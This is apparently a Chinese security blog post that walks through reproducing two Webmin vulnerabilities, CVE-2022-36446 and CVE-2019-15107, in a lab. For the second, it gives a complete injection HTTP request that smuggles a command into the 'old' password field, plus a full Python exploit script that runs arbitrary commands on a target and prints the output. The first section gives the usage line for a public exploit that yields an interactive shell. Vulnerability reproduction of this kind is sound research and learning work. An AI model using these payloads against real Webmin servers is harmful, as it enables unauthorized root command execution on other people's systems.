webmin漏洞复现集合
1.CVE-2022-36446(webmin命令注入漏洞复现)
webmin简介:
```
Webmin是一款功能强大的基于Web的Unix系统管理工具,管理员可以通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin版本1.997之前,存在命令注入将实现在系统上以 root 权限运行命令
```
漏洞危害级别:
```
高危
命令注入
```
漏洞影响版本及编号
```
webmin < 1.997
```
漏洞环境搭建
webmin是一款开源的unix系统管理工具,我们可以在github上进行下载,下载之前的历史版本即可
[下载地址](https://github.com/webmin/webmin/releases?page=2)
将源码放置到服务器上进行解压即可,解压完成之后就可以看到相关的源码包内容了
![image-20220927135455518](img/image-20220927135455518.png)
安装运行脚本./setup.sh即可
![image-20220927135851129](img/image-20220927135851129.png)
这边配置的是8082端口加ssl进行相关配置和认证登录
![image-20220927140957697](img/image-20220927140957697.png)
此RCE是后台RCE,需要知道webmin的登录用户和密码才能实现利用,exp/POC利用脚本如下所示:
[webmin的EXP下载地址](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE)
![image-20220927141443389](img/image-20220927141443389.png)
```
使用方法:
python ./CVE-2022-36446.py -t <target> -u <user> -p <pass> -k -I #执行成功之后会获取到一个交互式的shell
```
![image-20220927141603060](img/image-20220927141603060.png)
漏洞修复方式
目前此漏洞已经修复,受影响用户可更新到Webmin 1.997或更高版本。
下载链接:
https://webmin.com/
2.CVE-2019-15107(webmin未授权RCE漏洞)
前言:
```
Webmin是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等
```
这边先借助于vulhub平台进行漏洞复现,本次复现的webmin版本的为1.910,属于漏洞影响版本范围内
![image-20220927144118189](img/image-20220927144118189.png)
漏洞产生原因:
```
该漏洞由于`password_change.cgi`文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,后经知道创宇404实验室发现,该漏洞的存在实则是sourceforge上某些版本的安装包和源码被植入了后门导致的
```
漏洞影响版本:
```
1.890 <= webmin <= 1.920
```
漏洞触发点:
```
/password-change.cgi #漏洞影响页面
```
漏洞触发的数据包如下所示:
```
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 #执行id命令
```
用户的密码文件如下所示,webmin支持系统用户和自定义管理员用户进行后台管理处的登录:
```
cat /etc/webmin/webmin-1.920/miniserv.users #查看的结果
root:x #结果
```
将数据包进行修改,然后提交到相关目标进行执行,这样就可以看到相关的结果,以下是自己改写的python3代码的EXP/POC
```python
#-*- coding:utf-8 -*-
import requests
from optparse import OptionParser
import re
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
def usage():
print(
'''
python ./cve-2019-15107.py -t <target> -c <cmd>
Author: Arenid
'''
)
def req_exec(target,cmd):
if target == "" or target == None:
print("请输入需要测试的目标!!")
return False
if cmd == "" or cmd == None:
print("请输入需要执行的命令!!")
return False
proxies = {
'http':'127.0.0.1:8080',
'https':'127.0.0.1:8080'
}
headers = {
'Accept-Encoding': "gzip, deflate",
'Accept': "*/*",
'Accept-Language': "en",
'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
'Connection': "close",
'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
'Referer': "%s/session_login.cgi"%target,
'Content-Type': "application/x-www-form-urlencoded",
'Content-Length': "60",
'cache-control': "no-cache"
}
data = {
'user':'rootxx',
'pam':'',
'expired':'2',
'old':'test|%s'%cmd ,
'new1':'test2',
'new2':'test2'
}
target_url = target + '/password_change.cgi'
res = requests.post(target_url,headers=headers,data=data,proxies=proxies,verify=False)
if res.status_code == 200:
m = re.compile(r"<center><h3>Failed to change password : The current password is incorrect(.*)</h3></center>", re.DOTALL)
cmd_result = m.findall(res.text)[0]
print(cmd_result)
def main():
parser = OptionParser(usage=usage())
parser.add_option("-t", dest="target",type='string', help="input your target url")
parser.add_option("-c", dest="command",type='string', help="input your target cmd")
(options, args) = parser.parse_args()
req_exec(options.target,options.command)
if __name__ == '__main__':
main()
```
![image-20220927152408458](img/image-20220927152408458.png)
到此漏洞复现结束,坚持漏洞复现,塑造更好的自己,加油!!没有网络安全就没有国家安全!!!
webmin漏洞复现集合相关推荐
- webmin 远程代码漏洞复现
漏洞简介 webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关 ...
- CVE-2019-15107 webmin RCE漏洞复现
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webadmin RCE漏洞复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成 ...
- 漏洞复现-webmin漏洞系列分析与利用
webmin漏洞系列分析与利用 Webmin 远程代码执行CVE-2022-0824 编号CVE编号:CVE-2022-0824 影响版本 漏洞简介 复现 拉取漏洞镜像 启动漏洞环境 解决方案 POC ...
- php打开网页执行即执行bat程序_CVE202011107:XAMPP任意命令执行漏洞复现
0x00简介 XAMPP是一个把Apache网页服务器与PHP.Perl及MariaDB集合在一起的安裝包,允许用戶可以在自己的电脑上轻易的建立网页服务器.该软件与phpstudy类似. 2020年4 ...
- redis 公网 安全_redis漏洞复现
一.漏洞简介 什么是redis redis是一个key-value存储系统.和Memcached类似,它支持存储的value类型相对更多,包括string(字符串).list(链表).set(集合). ...
- Drupal漏洞复现:CVE-2019-6341
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏 ...
- 渗透测试-Openssl心脏出血漏洞复现
心脏滴血 早在2014年,互联网安全协议OpenSSL被曝存在一个十分严重的安全漏洞.在黑客社区,它被命名为"心脏出血",表明网络上出现了"致命内伤".利用该漏 ...
- 漏洞检测与防御:Redis未授权访问漏洞复现
漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...
- 网络安全漏洞复现与分析
漏洞介绍 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令. ...
最新文章
- 利用python来解析html
- docker自动部署
- 写给粪坑里的钻石——烂公司里的好员工
- Uber提出有创造力的POET:自行开发更困难环境和解决方案
- 现在写程序要像蚊子一样WZ132
- RTX5 | 软件定时器01 - 创建一个软件定时器(单次运行)
- 课程设计-三层架构ASP.NET作品分享网站(sql server数据库)
- 4月第1周回顾:微软向雅虎发最后通牒 头号***伏法
- 方法重载overload
- vue随笔1-element-UI中checkbook多选框-复选框样式修改
- 第五节 B-S看涨看跌期权定价
- Python爬虫爬取纵横中文网小说
- 2020年同济软院夏令营经历
- 最好的远程桌面破解软件frdpb_v2
- 尤里先生查看陌生人朋友圈教程_微信怎么看陌生人朋友圈 强看陌生人朋友圈教程...
- Java校验框架-Oval
- 看头发就知道你得什么病
- 百度飞桨PP-YOLOE ONNX 在LabVIEW中的部署推理(含源码)
- 内网solr全文搜索服务器,快解析一步映射让外网访问
- 基于Spark的电影推荐系统(推荐系统~4)
热门文章
- android手机制造商_如果您关注更新,则应注意这些Android制造商
- 1-初识jeecg-boot——源码下载、代码生成、简单体验
- Java...点点点语法
- iOS开发- 启动动画(动态欢迎界面,非静态Default)
- C++关于默认构造函数和无参构造函数
- Linux系统常用的Xshell运行命令-新手入门级
- 螺旋矩阵java_Java 实现螺旋矩阵的方法
- AR Trump2(多卡识别学习)
- php视图模型,ThinkPHP中视图模型详解.
- 第 2 章 内核一瞥